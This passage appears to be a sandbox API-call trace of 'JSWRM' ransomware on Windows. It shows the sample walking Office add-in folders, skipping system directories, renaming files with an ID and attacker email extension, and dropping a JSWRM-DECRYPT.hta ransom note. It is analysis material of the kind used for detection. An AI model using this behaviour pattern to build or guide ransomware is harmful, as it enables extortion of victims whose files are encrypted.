[0125.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0125.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0125.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0125.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0125.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0125.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2474b8 [0125.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0125.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0125.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.491] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-latn\\PowerViewRes.sr-latn.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn\\powerviewres.sr-latn.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-latn\\PowerViewRes.sr-latn.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn\\powerviewres.sr-latn.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.493] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x160a83ba, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x160a83ba, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1611aacd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f53a, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.sr-latn.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0125.493] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0125.493] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ede724, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2=".") returned 1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="..") returned 1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="...") returned 1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="windows") returned -1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="recovery") returned 1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="perflogs") returned 1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="documents and settings") returned 1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="$RECYCLE.BIN") returned 1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="system volume information") returned -1 [0125.493] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="msocache") returned 1 [0125.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0125.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0125.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0125.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0125.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0125.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0125.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn-cs\\jswrm-decrypt.hta")) returned 0xffffffff [0125.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0125.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0125.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0125.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x2501e8 [0125.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x251fb8 [0125.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0125.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0125.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0125.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0125.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn-cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0125.496] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.496] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0125.497] CloseHandle (hObject=0x314) returned 1 [0125.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0125.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x251fb8 | out: hHeap=0x1e0000) returned 1 [0125.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0125.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0125.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0125.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0125.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0125.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0125.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0125.498] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-Latn-CS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\sr-latn-cs\\jswrm-decrypt.hta")) returned 0x20 [0125.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0125.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0125.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0125.498] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\sr-Latn-CS\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4175935e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0125.505] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0125.506] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ede724, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4175935e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0125.506] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0125.506] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0125.506] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x15f50e21, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc40b8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0125.506] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0125.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0125.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x2413a8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0125.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0125.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241268, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0125.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0125.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0125.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0125.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0125.506] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4175935e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4175935e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4175935e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0125.506] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0125.506] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0125.506] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0125.507] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0125.507] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0125.507] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0125.507] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0125.507] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0125.507] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0125.507] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0125.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0125.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0125.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0125.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0125.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0125.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0125.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0125.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0125.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0125.507] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x443f20, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x443f20, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4903b8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11ac8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.507] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0125.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0125.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0125.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0125.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0125.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0125.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0125.508] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6f2911, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6f2911, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6f2911, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0125.508] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0125.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0125.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0125.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) 